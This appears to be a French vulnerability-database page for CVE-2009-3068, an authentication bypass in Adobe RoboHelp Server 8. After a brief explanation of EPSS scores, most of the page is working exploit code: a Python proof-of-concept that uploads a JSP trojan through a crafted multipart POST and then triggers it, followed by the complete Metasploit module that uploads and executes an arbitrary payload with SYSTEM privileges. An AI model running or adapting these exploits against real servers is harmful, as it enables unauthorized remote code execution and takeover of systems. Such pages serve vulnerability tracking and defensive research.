CVE-2009-3068 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/36245/info Adobe RoboHelp Server is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to upload and execute arbitrary code with SYSTEM-level privileges. RoboHelp Server 8.0 is affected; other versions may also be vulnerable. b="-----------------------------111\r\n" b+="Content-Disposition: form-data; name=\"filename\"; filename=\"test.jsp\"\r\n" b+="Content-Type: application/x-java-archive\r\n\r\n" b+=data # source code of our JSP trojan here b+="\r\n" b+="-----------------------------111--\r\n" s="POST /robohelp/server?PUBLISH=1 HTTP/1.1\r\n" s+="Host: %s:%d\r\n"%(host, port) s+="User-Agent: Mozilla\r\n" s+="UID: 1234\r\n" s+="Content-Type: multipart/form-data; boundary=---------------------------111\r\n" s+="Content-Length: %d\r\n"%len(b) s+="\r\n" s+=b sock.sendall(s) reply=sock.recv(4000) Get the value of 'sessionid' from the reply and use it in the following to execute the JSP trojan: s="GET /robohelp/robo/reserved/web/%s/test.jsp HTTP/1.0\r\n\r\n" % session_id sock.sendall(s)

## # $Id: adobe_robohelper_authbypass.rb 11127 2010-11-24 19:35:38Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute', 'Description' => %q{ This module exploits an authentication bypass vulnerability which allows remote attackers to upload and execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11127 $', 'Platform' => 'win', 'Privileged' => true, 'References' => [ [ 'CVE', '2009-3068' ], [ 'OSVDB', '57896'], [ 'URL', 'http://www.intevydis.com/blog/?p=69' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-066' ], ], 'Targets' => [ [ 'Universal Windows Target', { 'Arch' => ARCH_JAVA, 'Payload' => { 'DisableNops' => true, }, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 23 2009' )) register_options( [ Opt::RPORT(8080) ], self.class ) end def exploit page = Rex::Text.rand_text_alpha_upper(8) + ".jsp" uid = rand(20).to_s file = "-----------------------------#{uid}\r\n" file << "Content-Disposition: form-data; name=\"filename\"; filename=\"#{page}\"\r\n" file << "Content-Type: application/x-java-archive\r\n\r\n" file << payload.encoded file << "\r\n" print_status("Sending our POST request...") res = send_request_cgi( { 'uri' => '/robohelp/server?PUBLISH=' + uid, 'version' => '1.1', 'method' => 'POST', 'data' => file, 'headers' => { 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, 'UID' => uid, } }, 5) if ( res and res.message =~ /OK/ ) id = res['sessionid'].to_s.strip print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...") data = send_request_raw({ 'uri' => '/robohelp/robo/reserved/web/' + id + '/' + page , 'method' => 'GET', 'version' => '1.0', }, 5) handler else print_error("No SESSIONID acquired...") return end end end